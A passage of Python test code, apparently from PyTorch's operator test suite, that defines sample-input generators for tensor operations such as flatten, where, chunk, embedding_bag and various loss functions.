(),) make_tensor_partial = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for shape in shapes: samples.append(SampleInput(make_tensor_partial(shape))) if len(shape) > 1: samples.append(SampleInput(make_tensor_partial(shape), kwargs=dict(start_dim=1, end_dim=-1))) return samples def reference_inputs_flatten(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_flatten(op, device, dtype, requires_grad, **kwargs) # shape x start_dim x end_dim cases = ( ((5, 4, 0, 1, 3, 7), 1, 3), ((5, 4, 0, 1, 3, 7), 4, 5), ((5, 4, 1, 1, 3, 7), 2, 3), ((), 0, -1), ((1,), 0, -1), ((3, 7, 5), 1, 2), ((4, 5), 1, 1), ((1, 5, 5, 1, 5, 1, 5, 1), 0, 2), ((1, 5, 5, 1, 5, 1, 5, 1), 3, -1), ((1, 5, 5, 1, 5, 7, 5, 1), -2, -1), ((2, 4, 2), 0, 1), ((4, 2, 2), 1, 2), ((0, 3, 4, 5), 1, 3), ) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for shape, start, end in cases: yield SampleInput(make_arg(shape), args=(start, end,)) yield SampleInput(make_arg(shape, noncontiguous=True).transpose(0, -1), args=(start, end,)) yield SampleInput(make_arg(shape).transpose(0, -1), args=(start, end,)) def sample_inputs_select(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((S, S, S), (1, 2)), ((S, S, S), (-1, 2)), ((S, S, S), (-1, -1)), ((S, S, S), (1, -1)), ((S,), (0, 2)) ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def sample_inputs_select_scatter(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((S, S, S), (S, S), (1, 2)), ((S, S, S), (S, S), (-1, 2)), ((S, S, S), (S, S), (-1, -1)), ((S, S, S), (S, S), (1, -1)), ((S,), (), (0, 2)) ) for input_shape, src_shape, args in cases: input_ = make_arg(input_shape) src = make_arg(src_shape) yield SampleInput(input_, args=(src, *args)) def sample_inputs_slice_scatter(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((L, L, L), (L, L, L,), (0, 0, L, 1)), ((L, L, L), (L // 2, L, L,), (0, L // 2, L, 1)), ((L, L, L), (L // 4, L, L,), (0, L // 2, L, 2)), ((L, L, L), (L, L, L,), (1, 0, L, 1)), ((L, L, L), (L, L // 2, L,), (1, L // 2, L, 1)), ((L, L, L), (L, L // 4, L,), (1, L // 2, L, 2)), ((L, L, L), (L, L, L,), (2, 0, L, 1)), ((L, L, L), (L, L, L // 2,), (2, L // 2, L, 1)), ((L, L, L), (L, L, L // 4,), (2, L // 2, L, 2)), ) for input_shape, src_shape, args in cases: input_ = make_arg(input_shape) src = make_arg(src_shape) yield SampleInput(input_, args=(src, *args)) def sample_inputs_expand(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((S, 1, 1), (S, S, S)), ((S, 1, S), (S, S, S)), ((S, 1, S), (-1, S, -1)), ((S, 1, S), (-1, S, S)), ((S, 1), (S, S, S)), ((1,), (S, S, S)), ((1, S), (1, 1, S)), ((), ()), ((), (1, 3, 2)), ) for case in cases: shape, args = case yield(SampleInput(make_arg(shape), args=(args, ))) def sample_inputs_conversion(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) shapes = ((), (2, 3)) memory_format_options = [None, torch.contiguous_format] for shape, memory_format in itertools.product(shapes, memory_format_options): yield SampleInput(make_arg(shape), kwargs={'memory_format': memory_format} if memory_format else {}) yield SampleInput(make_arg((2, 3, 2, 3)), kwargs={'memory_format': torch.channels_last}) def sample_inputs_expand_as(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device) cases = (((S, 1, 1), (S, S, S)), ((), ()), ((), (1, 1)), ) for shape, shape_other in cases: yield(SampleInput(make_arg(shape, requires_grad=requires_grad), args=(make_arg(shape_other, requires_grad=False), ))) def sample_inputs_where(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) def make_bool_mask(shape): # Make sure atleast one element is nonzero, # except for empty tensor mask_t = make_tensor(shape, dtype=torch.bool, device=device, requires_grad=False) if mask_t.numel() == 0: return mask_t elif mask_t.numel() == 1: mask_t.fill_(True) return mask_t if mask_t.sum() == 0: def random_index(shape): return tuple(map(lambda max_idx: random.randint(0, max_idx), shape)) mask_t[random_index(mask_t.shape)] = True return mask_t return mask_t cases = (((M, M), (M, M), (M, M), False), ((M, 1, M), (M, M), (M, M, 1), True), ((), (), (), False), ((M, 1, M), (), (M, M, 1), True), ((), (M, M), (), True),) for shape, mask_shape, other_shape, broadcasts_input in cases: yield SampleInput(make_arg(shape), args=(make_bool_mask(mask_shape), make_arg(other_shape)), broadcasts_input=broadcasts_input) # TODO: add reference inputs for where(condition) signature def reference_inputs_where(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_where(op, device, dtype, requires_grad, **kwargs) make_cond = partial(make_tensor, dtype=torch.bool, device=device, requires_grad=requires_grad) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) # noncontiguous c = make_cond((10, 3), noncontiguous=True) a = make_arg((10, 1), noncontiguous=True) b = make_arg((3, 10, 3)).transpose(0, -1) # NOTE that the OpInfo for where takes samples of the form a, cond, b yield SampleInput(a, args=(c, b)) # type promoting other_dtype = torch.double if dtype is not torch.double else torch.long c = make_cond((10, 3), noncontiguous=True) a = make_arg((10, 1), dtype=torch.long) b = make_arg((10, 1)) yield SampleInput(a, args=(c, b)) # NaN propagation if dtype.is_floating_point or dtype.is_complex: if dtype.is_floating_point: nan = float('nan') else: # dtype.is_complex nan = complex(float('nan'), float('nan')) c = make_cond((1, 10, 3)) a = make_arg((10, 3), noncontiguous=True) a[2, 1] = nan b = make_arg((1, 3)) b[0, 2] = nan yield SampleInput(a, args=(c, b)) def error_inputs_where(op_info, device, **kwargs): shape = (S,) err_msg = "Expected all tensors to be on the same device" for devices in product(('cpu', device), repeat=3): if len(set(devices)) == 2: si = SampleInput(make_tensor(shape, device=devices[0], dtype=torch.float32), args=(make_tensor(shape, dtype=torch.bool, device=devices[1]), make_tensor(shape, device=devices[2], dtype=torch.float32))) yield ErrorInput(si, error_regex=err_msg) def sample_inputs_nonzero(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S)) inputs = [] for shape in sizes: # construct input without any non-zero elements zeros = torch.zeros(shape, dtype=dtype, device=device, requires_grad=requires_grad) inputs.append(zeros) # construct input with mixed zero and non-zero elements mixed = make_arg(shape).requires_grad_(False) mask_t = make_tensor(shape, dtype=torch.bool, device=device, requires_grad=False) mixed[mask_t] = 0 inputs.append(mixed) for input_t, as_tuple in product(inputs, [False, True]): yield(SampleInput(input_t.clone().requires_grad_(requires_grad), kwargs=dict(as_tuple=as_tuple))) def sample_inputs_chunk(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((S, S, S), (2,)), ((S, S, S), (S, 1)), ((S, S, S), (S, -1))) for case in cases: shape, args = case yield(SampleInput(make_arg(shape), args=args)) def reference_inputs_chunk(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_chunk(op, device, dtype, requires_grad, **kwargs) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) # shape x chunks x dim cases = ( ((13, 9, 11), 17, -1), ((13, 9, 11), 11, -1), ((13,), 12, -1), ((15,), 12, -1), ((15,), 7, 0), ((15,), 9, 0), ((3, 7), 9, 1), ((3, 7), 9, 0), ((3, 7), 2, 0), ((3, 7), 3, 0), ((3, 7), 1, 0), ((3, 7), 1, 1), ((4, 4), 2, 0), ) for shape, chunks, dim in cases: yield SampleInput(make_arg(shape), args=(chunks, dim)) def sample_inputs_kthvalue(op_info, device, dtype, requires_grad, **kwargs): def _tensor(shape, dtype=dtype, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) test_cases = [ (_tensor((S, S, S)), (2,)), (_tensor((S, S, S)), (2, 1,)), (_tensor((S, S, S)), (2, -1,)), (_tensor((S, S, S)), (2, 1, True,)), (_tensor((S, S, S)), (2, -1, True,)), (_tensor((S,)), (2, 0,)), (_tensor((S,)), (2, 0, True,)), (_tensor(()), (1,)), (_tensor(()), (1, 0,)), (_tensor(()), (1, 0, True)) ] return [SampleInput(tensor, args=args) for tensor, args in test_cases] def error_inputs_kthvalue(op_info, device, **kwargs): # tests overlapping output fails t = make_tensor(10, dtype=torch.float32, device=device) indices = torch.empty((), device=device, dtype=torch.long) si = SampleInput(t, args=(5,), kwargs={'out': (t, indices)}) k_out_of_range_err = "selected number k out of range for dimension" return (ErrorInput(si, error_regex="unsupported operation"), ErrorInput(SampleInput(torch.randn(2, 2, device=device), args=(3, 0)), error_regex=k_out_of_range_err), ErrorInput(SampleInput(torch.randn(2, 2, device=device), args=(3,)), error_regex=k_out_of_range_err), ErrorInput(SampleInput(torch.tensor(2, device=device), args=(3,)), error_regex=k_out_of_range_err),) def sample_inputs_dropout(op_info, device, dtype, requires_grad, *, train=None, valid_input_dim=None, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) if valid_input_dim: cases = ((S,) * i for i in valid_input_dim) else: cases = ((S, S), (S,), ()) p_vals = [0.0, 0.5, 1.0] # This is to handle special case for feature_alpha_dropout which has different # supported dtypes depending on `train` parameter training_vals = [train] if train is not None else [True, False] for case, p, training in product(cases, p_vals, training_vals): yield SampleInput(make_arg(case), kwargs=dict(p=p, training=training)) yield SampleInput(make_arg(case), kwargs=dict()) def sample_inputs_embedding_bag(op_info, device, dtype, requires_grad, **kwargs): def make_input(shape): return make_tensor(shape, device=device, dtype=dtype, requires_grad=requires_grad) def make_long_input(shape, *, low, high, noncontiguous=False): return make_tensor(shape, device=device, dtype=torch.long, low=low, high=high, noncontiguous=noncontiguous) def make_per_sample_weight(flag, idx): # a tensor of float / double weights, or None # to indicate all weights should be taken to be 1 if flag: return make_input(idx.shape) return None offsets = torch.tensor([0, 3], device=device, dtype=torch.long) for generate_per_sample_weight in (True, False): for mode in ('sum', 'mean', 'max'): # per_sample_weights is only supported for mode='sum' (got mode='****') if generate_per_sample_weight and mode in ('mean', 'max'): continue # 1-D index tensor idx = make_long_input((S,), low=0, high=M) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'offsets': offsets, 'mode': mode, 'per_sample_weights': per_sample_weights}) idx = make_long_input((S,), low=0, high=M, noncontiguous=True) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'offsets': offsets, 'mode': mode, 'per_sample_weights': per_sample_weights}) # bag with zero length idx = make_long_input((S,), low=0, high=M, noncontiguous=True) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'offsets': torch.tensor([0, 0, 3], device=device, dtype=torch.long), 'mode': mode, 'per_sample_weights': per_sample_weights}) # 2-D index tensor idx = make_long_input((S, S), low=0, high=M) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'mode': mode, 'per_sample_weights': per_sample_weights}) idx = make_long_input((S, S), low=0, high=M, noncontiguous=True) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'mode': mode, 'per_sample_weights': per_sample_weights}) # The gradient vector at `padding_idx` is not updated. # Negative padding_idx idx = make_long_input((6,), low=0, high=S) idx[0] = 4 idx[4] = 4 per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((S, S)), args=(idx,), kwargs={'padding_idx': -1, 'offsets': offsets, 'mode': mode, 'per_sample_weights': per_sample_weights},) idx = make_long_input((3, 3), low=0, high=S) # Positive padding_idx idx[0, 0] = 2 idx[1, 1] = 2 per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((S, S)), args=(idx,), kwargs={'padding_idx': 2, 'mode': mode, 'per_sample_weights': per_sample_weights},) idx = make_long_input((6, ), low=0, high=S) weights = make_input((S, S)) offsets_ = torch.tensor([0, 3, 6], device=device, dtype=torch.long) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(weights, args=(idx,), kwargs={'mode': mode, 'offsets': offsets_, 'include_last_offset': True},) if not requires_grad: # Following inputs return different gradient from the numerical gradient. # This is expected and relevant tests are present in `test_nn.py`. # Due to inplace renorming of weight, the numerical gradient doesn't match the # analytical gradient. idx = make_long_input((2, 2), low=0, high=S) weights = make_input((S, S)) * 2 per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(weights, args=(idx,), kwargs={'max_norm': 1., 'mode': mode, 'per_sample_weights': per_sample_weights},) idx = make_long_input((6, ), low=0, high=S) weights = make_input((S, S)) * 2 per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(weights, args=(idx,), kwargs={'max_norm': 1., 'norm_type': 1.0, 'mode': mode, 'offsets': offsets, 'per_sample_weights': per_sample_weights},) if mode != 'max': # Scale the gradient based on the inverse frequency of a particular index. # Note : smax mode does not support sparse weights idx = make_long_input((2, 2), low=0, high=S) idx[0, 0] = 1 idx[0, 1] = 1 weights = make_input((S, S)) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(weights, args=(idx,), kwargs={'scale_grad_by_freq': True, 'mode': mode, 'per_sample_weights': per_sample_weights},) # gradcheck not implemented for sparse tensors. # Note : max mode does not support sparse weights idx = make_long_input((6, ), low=0, high=S) weights = make_input((S, S)) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(weights, args=(idx,), kwargs={'sparse': True, 'offsets': offsets, 'mode': mode, 'per_sample_weights': per_sample_weights}) idx = make_long_input((6, ), low=0, high=S) idx[0] = 1 # freq more than 1 idx[1] = 1 # freq more than 1 idx[3] = 0 # padding_idx weights = make_input((S, S)) * 2 per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(weights, args=(idx,), kwargs={'sparse': True, 'scale_grad_by_freq': True, 'padding_idx': 0, 'max_norm': 1., 'offsets': offsets, 'mode': mode, 'per_sample_weights': per_sample_weights}) def sample_inputs_embedding(op_info, device, dtype, requires_grad, **kwargs): def make_input(shape): return make_tensor(shape, device=device, dtype=dtype, requires_grad=requires_grad) def make_long_input(shape, *, low, high): return make_tensor(shape, device=device, dtype=torch.long, low=low, high=high) # 0-D index tensor idx = make_long_input((), low=0, high=M) yield SampleInput(make_input((M, S)), args=(idx,),) # 1-D index tensor idx = make_long_input((S,), low=0, high=M) yield SampleInput(make_input((M, S)), args=(idx,),) # 2-D index tensor idx = make_long_input((S, S), low=0, high=M) yield SampleInput(make_input((M, S)), args=(idx,),) if not requires_grad: # Following inputs return different gradient from the numerical gradient. # This is expected and relevant tests are present in `test_nn.py`. # The gradient vector at `padding_idx` is not updated. idx = make_long_input((2, 2), low=0, high=S) idx[0, 0] = 2 idx[1, 1] = 2 yield SampleInput(make_input((S, S)), args=(idx,), kwargs={'padding_idx': 2},) idx = make_long_input((2, 2), low=0, high=S) idx[0, 0] = 4 idx[1, 1] = 4 yield SampleInput(make_input((S, S)), args=(idx,), kwargs={'padding_idx': -1},) # Due to inplace renorming of weight, the numerical gradient doesn't match the # analytical gradient. idx = make_long_input((2, 2), low=0, high=S) weights = make_input((S, S)) * 2 yield SampleInput(weights, args=(idx,), kwargs={'max_norm': 1.},) idx = make_long_input((2, 2), low=0, high=S) weights = make_input((S, S)) * 2 yield SampleInput(weights, args=(idx,), kwargs={'max_norm': 1., 'norm_type': 1.0},) # Scale the gradient based on the inverse frequency of a particular index. idx = make_long_input((2, 2), low=0, high=S) idx[0, 0] = 1 idx[0, 1] = 1 weights = make_input((S, S)) yield SampleInput(weights, args=(idx,), kwargs={'scale_grad_by_freq': True},) # gradcheck not implemented for sparse tensors. idx = make_long_input((2, 2), low=0, high=S) weights = make_input((S, S)) yield SampleInput(weights, args=(idx,), kwargs={'sparse': True}) idx = make_long_input((3, 3), low=0, high=S) idx[0, 0] = 1 # freq more than 1 idx[0, 1] = 1 # freq more than 1 idx[1, 0] = 0 # padding_idx weights = make_input((S, S)) * 2 yield SampleInput(weights, args=(idx,), kwargs={'sparse': True, 'scale_grad_by_freq': True, 'padding_idx': 0, 'max_norm': 1.}) def sample_inputs_one_hot(op_info, device, dtype, requires_grad, **kwargs): def make_input(shape, *, low, high): return make_tensor(shape, device=device, dtype=dtype, low=low, high=high, requires_grad=requires_grad) shapes = ((), (S,), (L, M, S)) num_classess = (-1, 10) return [ SampleInput( make_input( shape, low=0, high=10 if num_classes == -1 else num_classes // 2, ), kwargs=dict(num_classes=num_classes), ) for shape, num_classes in itertools.product(shapes, num_classess) ] def sample_inputs_tensorinv(op_info, device, dtype, requires_grad, **kwargs): make_arg = make_fullrank_matrices_with_distinct_singular_values def make_input(): return make_arg(12, 12, device=device, dtype=dtype, requires_grad=requires_grad) # lhs / rhs shape can have any number of dimensions as long as their product equals 12 shapes = [ ((2, 2, 3), (12, 1)), ((4, 3), (6, 1, 2)), ] samples = [] for shape_lhs, shape_rhs in shapes: inp = make_input().reshape(*shape_lhs, *shape_rhs).detach() inp.requires_grad_(requires_grad) samples.append(SampleInput(inp, kwargs=dict(ind=len(shape_lhs)))) return samples def sample_inputs_tensorsolve(op_info, device, dtype, requires_grad, **kwargs): a_shapes = [(2, 3, 6), (3, 4, 4, 3)] # Zero-dim tensors are not supported in NumPy, so we skip them for now. # NumPy is used in reference check tests. # See https://github.com/numpy/numpy/pull/20482 for tracking NumPy bugfix. # a_shapes += [(0, 0, 1, 2, 3, 0)] dimss = [None, (0, 2)] for a_shape, dims in itertools.product(a_shapes, dimss): a = make_tensor(a_shape, dtype=dtype, device=device, requires_grad=requires_grad) b = make_tensor(a_shape[:2], dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(a, args=(b,), kwargs=dict(dims=dims)) def sample_inputs_loss(op_info, device, dtype, requires_grad, **kwargs): rhs_requires_grad = kwargs.get('rhs_requires_grad', requires_grad) _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Although most losses also support the reduce and size_average combination instead of reduce, the former is # deprecated since 0.4.1 and thus is not tested shapes_and_kwargs = ( ((), None), ((S,), dict(reduction="mean")), ((S,), dict(reduction="sum")), ((S,), dict(reduction="none")), ((S, S), None), ((S, S, S), None), ) for shape, kwargs in shapes_and_kwargs: yield SampleInput(_make_tensor(shape), args=(_make_tensor(shape, requires_grad=rhs_requires_grad),), kwargs=kwargs) def sample_inputs_grid_sample(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) batch_size = 2 num_channels = 3 modes = ("bilinear", "nearest") align_cornerss = (False, True) padding_modes = ("zeros", "border", "reflection") sample_inputs = [] for dim in (2, 3): modes_ = (*modes, "bicubic") if dim == 2 else modes for mode, padding_mode, align_corners in itertools.product(modes_, padding_modes, align_cornerss): sample_inputs.append( SampleInput( _make_tensor((batch_size, num_channels, *[S] * dim)), args=(_make_tensor((batch_size, *[S] * dim, dim)),), kwargs=dict( mode=mode, padding_mode=padding_mode, align_corners=align_corners, ) ) ) return sample_inputs def sample_inputs_cosine_embedding_loss(op_info, device, dtype, requires_grad, **kwargs): make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) def make_target(shape): shape = () if len(shape) == 1 else (shape[0], ) t = torch.randint(0, 2, shape, device=device, dtype=torch.long) # Label with -1 or 1 t = t * 2 - 1 target = t.to(dtype=dtype).detach_().requires_grad_(requires_grad) return target shapes = ((S, S), (S,)) reductions = ('none', 'mean', 'sum') for s, r in product(shapes, reductions): yield SampleInput( make_input(s), args=(make_input(s), make_target(s)), kwargs=dict(reduction=r, margin=random.uniform(-1, 1)) ) def sample_inputs_ctc_loss(op_info, device, dtype, requires_grad, **kwargs): input_length = 50 batch = 16 num_char = 20 target_length = 30 def make_log_probs(s): t = make_tensor(s, device=device, dtype=dtype) log_probs = t.log_softmax(2).to(device=device, dtype=dtype).detach().requires_grad_(requires_grad=requires_grad) return log_probs reductions = ('none', 'mean', 'sum') zero_inf = (True, False) for r, z in product(reductions, zero_inf): log_probs = make_log_probs((input_length, batch, num_char)) targets = torch.randint(1, num_char, (batch, target_length), dtype=torch.long, device=device) input_lengths = torch.full((batch, ), input_length, dtype=torch.long, device=device) target_lengths = torch.randint(10, target_length, (batch, ), dtype=torch.long, device=device) yield SampleInput(log_probs, args=(targets, input_lengths, target_lengths,), kwargs=dict(reduction=r, zero_infinity=z)) def sample_inputs_nll_loss(op_info, device, dtype, requires_grad, **kwargs): shape = (2, 3) num_classes = shape[1] make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # FIXME: Derivative wrt. weight not implemented make_weight = partial(make_tensor, num_classes, device=device, dtype=dtype, requires_grad=False) def make_target(shape, zeros=False): s = (shape[0], *shape[2:]) if len(shape) > 1 else () if zeros: return torch.zeros(s, device=device, dtype=torch.long) else: return make_tensor(s, low=0, high=shape[1] if len(shape) > 1 else shape[0], device=device, dtype=torch.long) def gen_shape_kwargs(): # Batched, non-batched and 2d shapes = (shape, (num_classes,), shape + (2, 2)) reductions = ('none', 'mean', 'sum') for reduction, s in product(reductions, shapes): yield make_input(s), make_target(s), dict(reduction=reduction) yield make_input(s), make_target(s), dict(weight=make_weight(), reduction=reduction) yield make_input(s), make_target(s), dict(weight=make_weight(low=0), reduction=reduction) yield make_input(s), make_target(s), dict(weight=make_weight(high=0), reduction=reduction) t = make_target(s) ignore = num_classes // 2 # If "mean", nll returns NaN, so it's not differentiable at those points if t.eq(ignore).all() and reduction == "mean": t.fill_(0) yield make_input(s), t, dict(ignore_index=num_classes // 2, reduction=reduction) yield make_input(s), t, dict(ignore_index=num_classes // 2, reduction=reduction, weight=make_weight()) # Test ignoring all the targets # If "mean", nll returns NaN, so it's not differentiable at those points if reduction != "mean": yield make_input(s), make_target(s, zeros=True), dict(ignore_index=0, reduction=reduction) for input, target, kwargs in gen_shape_kwargs(): yield SampleInput(input, args=(target,), kwargs=kwargs) def sample_inputs_binary_cross_entropy_with_logits( op_info, device, dtype, requires_grad, **kwargs ): make = partial(make_tensor, device=device, dtype=dtype) make_prob = partial(make, low=0, high=1) reductions = ("mean", "sum", "none") def make_weight_shape_kwargs(): kwargs = [] for shape in ((1,), (1, S), (S), (S, S)): kwargs.extend([((S, S), dict(reduction=reduction, weight=make(shape))) for reduction in reductions]) return kwargs shapes_and_kwargs = [ *[(shape, None) for shape in ((), (1,), (S,), (S, S), (S, S, S))], *[((S, S), dict(reduction=reduction)) for reduction in reductions], *make_weight_shape_kwargs(), *[((S, S), dict(reduction=reduction, pos_weight=make((S,), low=0))) for reduction in reductions], *[((S, S), dict(reduction=reduction, weight=make((S, S)), pos_weight=make((S,), low=0))) for reduction in reductions], ] for shape, kwargs in shapes_and_kwargs: yield SampleInput( make(shape, requires_grad=requires_grad), args=(make_prob(shape, requires_grad=requires_grad),), kwargs=kwargs, ) def sample_inputs_argwhere(op_info, device, dtype, requires_grad, **kwargs): yield SampleInput(torch.tensor([1, 0, 2, 0], dtype=dtype, device=device, requires_grad=requires_grad)) mask = torch.tensor([[0, 1, 0, 1, 0], [1, 1, 1, 1, 0], [0, 0, 0, 1, 0], [1, 0, 1, 1, 0], [1, 0, 0, 1, 0]], dtype=torch.bool, device=device) t = make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad) t[mask] = 0 yield SampleInput(t) t = make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad, noncontiguous=True) t[mask] = 0 yield SampleInput(t) t = make_tensor((S, 0), dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(t) yield SampleInput(torch.zeros((S,), dtype=dtype, device=device, requires_grad=requires_grad)) yield SampleInput(make_tensor((), dtype=dtype, device=device, requires_grad=requires_grad)) def _generate_sample_shape_reduction(): shapes = ((S,), (S, S), (S, S, S)) reductions = ('none', 'mean', 'sum') for s, r in product(shapes, reductions): yield s, r def sample_inputs_gaussian_nll_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Set low slightly above 0 so gradcheck doesn't accidentally dip below 0 make_var = partial(make_tensor, low=0.1, device=device, dtype=dtype, requires_grad=requires_grad) def gen_shape(shape): yield shape # Broadcast yield (*shape[:-1], 1) yield shape[:-1] def gen_shape_kwargs(): for s, r in _generate_sample_shape_reduction(): for t_s, v_s in product(gen_shape(s), gen_shape(s)): yield _make_tensor(s), _make_tensor(t_s), make_var(v_s), dict(reduction=r) yield ( _make_tensor(s), _make_tensor(t_s), make_var(v_s), dict(full=True, reduction=r) ) yield ( _make_tensor(s), _make_tensor(t_s), make_var(v_s), dict(eps=random.uniform(1e-6, 1e-3), reduction=r) ) yield ( _make_tensor(s), _make_tensor(t_s), make_var(v_s), dict(full=True, eps=random.uniform(1e-6, 1e-3), reduction=r) ) for input, target, var, kwargs in gen_shape_kwargs(): yield SampleInput(input, args=(target, var, ), kwargs=kwargs) def _generate_sample_inputs_nn_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) for s, r in _generate_sample_shape_reduction(): yield _make_tensor(s), _make_tensor(s), dict(reduction=r) def sample_inputs_hinge_embedding_loss(op_info, device, dtype, requires_grad, **kwargs): for input, target, d in _generate_sample_inputs_nn_loss(op_info, device, dtype, requires_grad, **kwargs): # target should contain either 1 or -1 as per docs mask = torch.rand_like(target) > 0.5 target[mask] = 1 target[~mask] = -1 d['margin'] = random.uniform(-9, 9) yield SampleInput(input, args=(target, ), kwargs=d) # scalar input and target. _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(_make_tensor(()), args=(_make_tensor(()), )) def error_inputs_hinge_embedding_loss(op, device, **kwargs): make_input = partial(make_tensor, device=device, dtype=torch.float32) # invalid reduction value yield ErrorInput(SampleInput(make_input(5, 4), args=(make_input(5, 4),), kwargs={'reduction': 'abc'}), error_type=ValueError, error_regex='is not a valid value') def reference_inputs_hinge_embedding_loss(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_hinge_embedding_loss(op, device, dtype, requires_grad, **kwargs) make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) for reduction in ('sum', 'mean', 'none'): if dtype.is_floating_point: # only supports ints and floats # NaN propagation inp = make_input((10, )) inp[2] = float('nan') target = make_input((10, )) # target should contain either 1 or -1 as per docs mask = torch.rand_like(target) > 0.5 target[mask] = -1 target[~mask] = 1 yield SampleInput(inp, args=(target,), kwargs={'reduction': reduction}) # Inf Handling inp = make_input((10, )) inp[4] = float('inf') target = make_input((10, )) mask = torch.rand_like(target) > 0.5 target[mask] = -1 target[~mask] = 1 yield SampleInput(inp, args=(target,), kwargs={'reduction': reduction}) # Broadcasting inp = make_input((5, 5)) target = make_input((1, 5)) mask = torch.rand_like(target) > 0.5 target[mask] = -1 target[~mask] = 1 yield SampleInput(inp, args=(target,), kwargs={'reduction': reduction}) def sample_inputs_huber_loss(op_info, device, dtype, requires_grad, **kwargs): for input, target, d in _generate_sample_inputs_nn_loss(op_info, device, dtype, requires_grad, **kwargs): d['delta'] = random.uniform(1e-3, 9) yield SampleInput(input, args=(target, ), kwargs=d) def sample_inputs_poisson_nll_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) def gen_shape_kwargs(): for s, r in _generate_sample_shape_reduction(): for li in (True, False): for f in (True, False): i1 = _make_tensor(s) i2 = _make_tensor(s) # For Poisson NLL Loss, # target is assumed to be from # Poisson Distribution which # always has positive samples t1 = _make_tensor(s, low=0) t2 = _make_tensor(s, low=0) if not li: i1.abs_() i2.abs_() t1.abs_() t2.abs_() yield ( i1, t1, dict(log_input=li, full=f, reduction=r) ) yield ( i2, t2, dict(log_input=li, full=f, eps=random.uniform(1e-8, 1e-3), reduction=r) ) for input, target, kwargs in gen_shape_kwargs(): yield SampleInput(input, args=(target, ), kwargs=kwargs) def sample_inputs_triplet_margin_loss(op_info, device, dtype, requires_grad, with_distance=False, **kwargs): make = partial(make_tensor, (S, M), device=device, dtype=dtype, requires_grad=requires_grad) kwargss = ( *[dict(margin=margin) for margin in (1e-6, 1.0, 10.0)], dict(swap=True), *[dict(reduction=reduction) for reduction in ("mean", "sum", "none")], ) for kwargs in kwargss: input = make() args = (make(), make()) if with_distance: kwargs["distance_function"] = torch.nn.PairwiseDistance() yield SampleInput(input, args=args, kwargs=kwargs) def sample_inputs_pairwise_distance(op_info, device, dtype, requires_grad, **kwargs): make = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) shape = (3,) batched_shape = (2, *shape) shapes_and_kwargs = [ (shape, None), (batched_shape, None), (shape, dict(keepdim=True)), (batched_shape, dict(keepdim=True)), (shape, dict(p=5.0)), (shape, dict(p=-1.0)), (shape, dict(eps=1.0)), ] return [ 